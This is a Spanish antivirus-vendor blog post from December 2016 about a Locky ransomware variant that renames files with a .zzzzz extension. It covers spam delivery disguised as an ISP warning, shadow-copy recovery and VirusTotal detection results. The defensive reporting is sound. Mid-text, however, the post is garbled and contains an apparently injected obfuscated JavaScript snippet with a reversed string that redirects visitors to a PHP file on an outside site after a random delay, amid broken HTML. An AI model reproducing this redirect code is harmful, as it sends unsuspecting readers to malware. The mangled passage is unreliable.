VARIANTE DE RANSOMWARE LOCKY ZZZZZ QUE VAN LLEGANDO COMO EN LOS ULTIMOS DIAS
El fatídico LOCKY, actualmemte añade .zzzzz a la extensión de los ficheros cifrados, además de cambiarles el nombre, convirtiendo una imagen .JPG, por ejemplo, en un fichero de nombre variable y extensión zzzzz:
82EFB237-1498-3A47-0ECA-697B6FAD13BE.zzzzz
eliminando las versiones anteriores del fichero, con lo que elimina la posibilidad de restaurarlo a partir del Shadow Copy que hubiera creado. De todas formas, si no se tiene copia de seguridad, conviene mirar si pulsando sobre el fichero cifrado con Botón derecho en Propiedades -> Versiones Anteriores , ver si indican que no hay ninguna versión anterior disponble , ya que en algunas variantes, de las muchas que hay de este engendro, han olvidado el borrar dichas copias, y, en tal caso, se puede, con ellas, restaurar el original.
La última noticia del mismo es que ahora se está distribuyendo a través de correos electrónicos que pretenden ser una advertencia del ISP, que señala que su ordenador está enviando SPAM. Estos mensajes de correo electrónico contendrán un tema de “spam mailout” y contienen un archivo adjunto con el nombre de logs_ [target_name] .zip. Dentro de este archivo ZIP hay un archivo JS que, cuando se abre, descargará y ejecutará una de las últimas variantes del ransomware Locky:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tobucket.com/albums/y514/WOAXXX/88c7fc03-ac76-4c88-8039-5472d7bf5278_zpsmoedmnv3.png” alt=”” width=”500″ height=”343″ /></p>
<p>El preanalisis de virus<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
total del fichero analizado, ofrece el siguiente informe:
MD5 bf432becfc993d0bec4fabeff48b1292
SHA1 f902f463a71b56d27b07b2d0fc3ec170ab7024a0
File size 219.4 KB ( 224703 bytes )
SHA256: 8835d4b487728eb3431238c20aca98d9a20ff158aa6b31d7ddd0e3c5b665609d
File name: bf432bec.exe
Detection ratio: 12 / 56
Analysis date: 2016-12-01 13:43:49 UTC ( 5 minutes ago )
0
2
Antivirus Result Update
AegisLab Packer.Gen!c 20161201
Avira (no cloud) TR/AD.Locky.xksyu 20161201
Bkav HW32.Packed.B7D9 20161201
CrowdStrike Falcon (ML) malicious_confidence_80% (D) 20161024
DrWeb Trojan.Encoder.7204 20161201
ESET-NOD32 NSIS/Injector.LM 20161201
GData Win32.Trojan-Ransom.Locky.ST76V0 20161201
Invincea virus.win32.sality.at 20161128
Kaspersky Trojan-Ransom.Win32.Shade.lfz 20161201
McAfee-GW-Edition BehavesLike.Win32.Ransom.dc 20161201
Qihoo-360 HEUR/QVM20.1.0000.Malware.Gen 20161201
Symantec Packed.NSISPacker!g2 20161201
Dicha versión del ELISTARA 35.74 que lo detecta y elimina, estará disponible en nuestra web a partir del 2-12-2016
saludos
ms, 1-12-2016
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.